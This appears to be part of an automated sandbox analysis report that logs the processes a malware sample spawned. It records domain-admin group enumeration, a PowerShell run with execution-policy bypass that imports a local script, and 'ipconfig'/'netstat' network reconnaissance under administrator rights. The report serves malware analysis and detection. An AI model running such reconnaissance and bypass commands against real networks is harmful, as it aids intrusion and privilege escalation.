                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Start time:11:23:06
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c net group 'domain admins' /domain
                                                                  Imagebase:0xbd0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Start time:11:23:06
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:net group 'domain admins' /domain
                                                                  Imagebase:0x1b0000
                                                                  File size:46592 bytes
                                                                  MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Start time:11:23:07
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\net1 group 'domain admins' /domain
                                                                  Imagebase:0x1320000
                                                                  File size:141312 bytes
                                                                  MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Start time:11:23:10
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass 'import-module C:\Users\user\Desktop\m2.ps1'
                                                                  Imagebase:0x7ff785e30000
                                                                  File size:447488 bytes
                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high
                                                                  Start time:11:24:47
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
Commandline: C:\Windows\system32\cmd.exe /c ipconfig /all
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Start time: 11:24:48
Start date: 05/04/2021
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: ipconfig /all
Imagebase: 0xfc0000
File size: 29184 bytes
MD5 hash: B0C7423D02A007461C850CD0DFE09318
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Start time: 11:24:48
Start date: 05/04/2021
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: ipconfig /all
Imagebase: 0xfc0000
File size: 29184 bytes
MD5 hash: B0C7423D02A007461C850CD0DFE09318
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Start time: 11:24:48
Start date: 05/04/2021
Path: C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit): true
Commandline: netstat -na
Imagebase: 0x1100000
File size: 32768 bytes
MD5 hash: 4E20FF629119A809BC0E7EE2D18A7FDB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Disassembly

Code Analysis